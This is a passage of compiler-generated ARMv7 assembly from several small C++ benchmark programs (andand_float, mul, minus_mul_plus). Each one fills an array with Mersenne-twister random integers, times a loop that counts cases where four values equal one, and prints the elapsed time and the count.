.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1}
sub r0, r1, r0
cmn r0, #1
beq .LBB1_6
@ BB#1:
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7
movw r6, #22144
movw r4, #0
movt r6, #40236
movt r4, #61382
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496]
ldr r0, [r5, r1, lsl #2]
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2
@ BB#5:
mov r1, r8
bl __aeabi_uidiv
b .LBB1_9
.LBB1_6:
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9]
add r0, r1, r0
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0]
movw r12, #45279
mov r2, #0
movt r12, #39176
.LBB2_1: @ =>This Inner Loop Header: Depth=1
add r1, r0, r2
ldr r3, [r1, #4]
ldr r5, [r1, #1588]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB2_1
@ BB#2: @ %.preheader
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]!
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB2_3
@ BB#4:
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496]
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_andand_float.cpp,%function
_GLOBAL__sub_I_andand_float.cpp: @ @_GLOBAL__sub_I_andand_float.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr}
b __cxa_atexit
.Ltmp17:
.size _GLOBAL__sub_I_andand_float.cpp, .Ltmp17-_GLOBAL__sub_I_andand_float.cpp
.Leh_func_end3:
.fnend
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_andand_float.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 14,480
|
exp/cpp_and_and/ARMv7/s/mul.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "mul.cpp"
.globl main
.align 3
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655
str r0, [sp, #32]
.LBB0_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528]
mov r0, #1
str r5, [sp, #24]
str r0, [sp, #28]
.Ltmp0:
movw r8, #36864
movt r8, #976
mov r0, r8
bl _Znwj
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
str r0, [r4, r5]
add r5, r5, #4
cmp r5, r8
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20]
bl _ZNSt6chrono3_V212system_clock3nowEv
movw r0, #36852
mov r1, #0
movt r0, #976
.LBB0_6: @ =>This Inner Loop Header: Depth=1
mov r2, r4
ldr r3, [r2, r1]!
add r1, r1, #4
ldr r7, [r2, #4]
ldr r6, [r2, #8]
cmp r7, #1
mov r7, #0
mvneq r7, #0
cmp r3, #1
movne r7, r5
cmp r6, #1
ldr r2, [r2, #12]
movwne r6, #0
and r3, r6, r7
cmp r2, #1
rsb r3, r3, #0
movwne r2, #0
tst r2, r3
ldrne r2, [sp, #20]
addne r2, r2, #1
strne r2, [sp, #20]
cmp r1, r0
bne .LBB0_6
@ BB#7:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp4:
@ BB#8:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI0_0
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp6:
@ BB#9: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp8:
@ BB#10: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_
.Ltmp10:
@ BB#11: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp12:
@ BB#12: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_14
@ BB#13:
mov r0, r4
bl _ZdlPv
.LBB0_14: @ %_ZNSt6vectorIiSaIiEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
.LBB0_15:
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_18
@ BB#16:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_17:
.Ltmp2:
mov r5, r0
.LBB0_18: @ %_ZNSt6vectorIiSaIiEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#19:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
.handlerdata
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1}
sub r0, r1, r0
cmn r0, #1
beq .LBB1_6
@ BB#1:
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7
movw r6, #22144
movw r4, #0
movt r6, #40236
movt r4, #61382
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496]
ldr r0, [r5, r1, lsl #2]
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2
@ BB#5:
mov r1, r8
bl __aeabi_uidiv
b .LBB1_9
.LBB1_6:
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9]
add r0, r1, r0
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0]
movw r12, #45279
mov r2, #0
movt r12, #39176
.LBB2_1: @ =>This Inner Loop Header: Depth=1
add r1, r0, r2
ldr r3, [r1, #4]
ldr r5, [r1, #1588]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB2_1
@ BB#2: @ %.preheader
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]!
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB2_3
@ BB#4:
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496]
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_mul.cpp,%function
_GLOBAL__sub_I_mul.cpp: @ @_GLOBAL__sub_I_mul.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr}
b __cxa_atexit
.Ltmp17:
.size _GLOBAL__sub_I_mul.cpp, .Ltmp17-_GLOBAL__sub_I_mul.cpp
.Leh_func_end3:
.fnend
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_mul.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 14,520
|
exp/cpp_and_and/ARMv7/s/minus_mul_plus.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "minus_mul_plus.cpp"
.globl main
.align 3
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655
str r0, [sp, #32]
.LBB0_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528]
mov r0, #1
str r5, [sp, #24]
str r0, [sp, #28]
.Ltmp0:
movw r8, #36864
movt r8, #976
mov r0, r8
bl _Znwj
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
str r0, [r4, r5]
add r5, r5, #4
cmp r5, r8
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20]
bl _ZNSt6chrono3_V212system_clock3nowEv
movw r0, #36852
movt r0, #976
.LBB0_6: @ =>This Inner Loop Header: Depth=1
mov r1, r4
ldr r2, [r1, r5]!
add r5, r5, #4
sub r2, r2, #1
ldmib r1, {r3, r7}
mul r2, r2, r2
sub r3, r3, #1
ldr r1, [r1, #12]
mla r2, r3, r3, r2
sub r6, r1, #1
rsb r1, r1, #1
sub r3, r7, #1
mul r1, r1, r6
mla r2, r3, r3, r2
cmp r2, r1
ldreq r1, [sp, #20]
addeq r1, r1, #1
streq r1, [sp, #20]
cmp r5, r0
bne .LBB0_6
@ BB#7:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp4:
@ BB#8:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0
sbc r1, r3, r1
bl __aeabi_l2d
